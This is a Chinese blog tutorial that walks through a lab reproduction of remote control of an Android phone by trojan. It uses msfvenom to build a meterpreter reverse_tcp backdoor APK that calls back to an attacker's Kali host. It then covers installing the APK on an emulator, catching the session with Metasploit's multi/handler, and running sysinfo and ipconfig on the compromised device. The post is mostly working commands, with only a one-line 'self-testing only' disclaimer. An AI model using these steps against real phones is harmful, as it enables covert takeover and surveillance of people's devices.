**手机木马远程控制复现**

2023年 8月 15日 51.3k 0

  • 环境
  • 攻击机:Kali-Linux-2021 虚拟机IP:192.168.1.47
  • 靶机:Android模拟器虚拟机 IP:192.168.1.7
  •  
  • 开始复现

·        首先从官网上下载模拟器雷电地址点击打开链接
**手机木马远程控制复现**-1
·        **手机木马远程控制复现**-1

·        下载完后。点击.exe文件直接运行安装,运行,下一步,直接完成安装。
**手机木马远程控制复现**-1
·        **手机木马远程控制复现**-1

·        安装完成后在电脑桌面显示下面logo
**手机木马远程控制复现**-1​       **手机木马远程控制复现**-1

·        对模拟器网络进行配置在右边的设置里面选择设置>网络设置>网络桥接模式开启,ip设置dhcp,最下面点击安装:**手机木马远程控制复现**-1
**手机木马远程控制复现**-1
首先打开kali,输入sudo su获取root模式
**手机木马远程控制复现**-1
**手机木马远程控制复现**-1

生成apk后门,lhost为kali的ip(可以根据自己的IP设定),lport指定一个端口5001。打开终端输入命令:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.47 lport=5001 R >854.apk
**手机木马远程控制复现**-1
**手机木马远程控制复现**-1

(生成apk文件)

生成文件后我们到/845.apk目录下拷贝我们的apk文件到我们的windows平台下然后启动我们的雷电模拟器,点击启动,在右下角有个apk,点击选择文件安装
**手机木马远程控制复现**-1
**手机木马远程控制复现**-1 **手机木马远程控制复现**-1
**手机木马远程控制复现**-1
(成功安装木马文件)

使用metasploit控制台对模拟器进行攻击:

启动msfconsole
**手机木马远程控制复现**-1
**手机木马远程控制复现**-1

加载模块

use exploit/multi/handler
**手机木马远程控制复现**-1
**手机木马远程控制复现**-1

(设置exploit)

设置模块

set payload android/meterpreter/reverse_tcp
**手机木马远程控制复现**-1
**手机木马远程控制复现**-1

(paload设置)

设置攻击机ip和端口号和启动后

输入show options查看参数
**手机木马远程控制复现**-1
**手机木马远程控制复现**-1

(监听中)

 Run一下,执行漏洞
**手机木马远程控制复现**-1
 

**手机木马远程控制复现**-1

回到我们的模拟器靶机,点击运行我们安装的文件,等待上线
**手机木马远程控制复现**-1
**手机木马远程控制复现**-1

双击运行

  看到成功返回shell
**手机木马远程控制复现**-1
**手机木马远程控制复现**-1

(返回shell)

查看模拟手机的版本信息:sysinfo
**手机木马远程控制复现**-1
**手机木马远程控制复现**-1

(查看android版本信息)

查看网络信息

Ipconfig
**手机木马远程控制复现**-1
**手机木马远程控制复现**-1

到这就结束了,感兴趣的小伙伴还不赶快去试试,提醒,仅供自己试验,拒绝恶搞别人。

相关文章

服务器端口转发,带你了解服务器端口转发
服务器开放端口,服务器开放端口的步骤
产品推荐:7月受欢迎AI容器镜像来了,有Qwen系列大模型镜像
如何使用 WinGet 下载 Microsoft Store 应用
百度搜索:蓝易云 – 熟悉ubuntu apt-get命令详解
百度搜索:蓝易云 – 域名解析成功但ping不通解决方案

发布评论